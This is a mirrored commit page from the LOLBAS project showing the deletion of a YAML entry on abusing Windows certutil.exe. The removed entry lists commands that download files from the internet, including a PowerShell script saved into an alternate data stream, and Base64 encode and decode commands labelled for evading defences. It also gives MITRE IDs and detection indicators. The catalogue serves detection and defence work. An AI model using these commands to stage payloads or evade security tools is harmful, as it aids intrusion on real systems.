mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 23:05:58 +02:00 
			
		
		
		
	Delete certutil.yml
This commit is contained in:
		| @@ -1,76 +0,0 @@ | ||||
| --- | ||||
| Name: Certutil.exe | ||||
| Description: Windows binary used for handeling certificates | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Commands: | ||||
|   - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe | ||||
|     Description: Download and save 7zip to disk in the current folder. | ||||
|     Usecase: Download file from Internet | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe | ||||
|     Description: Download and save 7zip to disk in the current folder. | ||||
|     Usecase: Download file from Internet | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | ||||
|     Description: Download and save a PS1 file to an Alternate Data Stream (ADS). | ||||
|     Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil -encode inputFileName encodedOutputFileName | ||||
|     Description: Command to encode a file using Base64 | ||||
|     Usecase: Encode files to evade defensive measures | ||||
|     Category: Encode | ||||
|     Privileges: User | ||||
|     MitreID: T1027 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1027 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil -decode encodedInputFileName decodedOutputFileName | ||||
|     Description: Command to decode a Base64 encoded file. | ||||
|     Usecase: Decode files to evade defensive measures | ||||
|     Category: Decode | ||||
|     Privileges: User | ||||
|     MitreID: T1140 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1140 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil --decodehex encoded_hexadecimal_InputFileName  | ||||
|     Description: Command to decode a hexadecimal-encoded file decodedOutputFileName | ||||
|     Usecase: Decode files to evade defensive measures | ||||
|     Category: Decode | ||||
|     Privileges: User | ||||
|     MitreID: T1140 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1140 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\certutil.exe | ||||
|   - Path: C:\Windows\SysWOW64\certutil.exe | ||||
| Code_Sample:  | ||||
|   - Code:546573745f62795f4c696f72(example of the encoded hexadecimal file) | ||||
| Detection: | ||||
|   - IOC: Certutil.exe creating new files on disk | ||||
|   - IOC: Useragent Microsoft-CryptoAPI/10.0 | ||||
|   - IOC: Useragent CertUtil URL Agent | ||||
| Resources: | ||||
|   - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 | ||||
|   - Link: https://twitter.com/mattifestation/status/620107926288515072 | ||||
|   - Link: https://twitter.com/egre55/status/1087685529016193025 | ||||
| Acknowledgement: | ||||
|   - Person: Matt Graeber | ||||
|     Handle: '@mattifestation' | ||||
|   - Person: Moriarty | ||||
|     Handle: '@Moriarty_Meng' | ||||
|   - Person: egre55 | ||||
|     Handle: '@egre55' | ||||
|   - Person: Lior Adar | ||||
| --- | ||||
		Reference in New Issue
	
	Block a user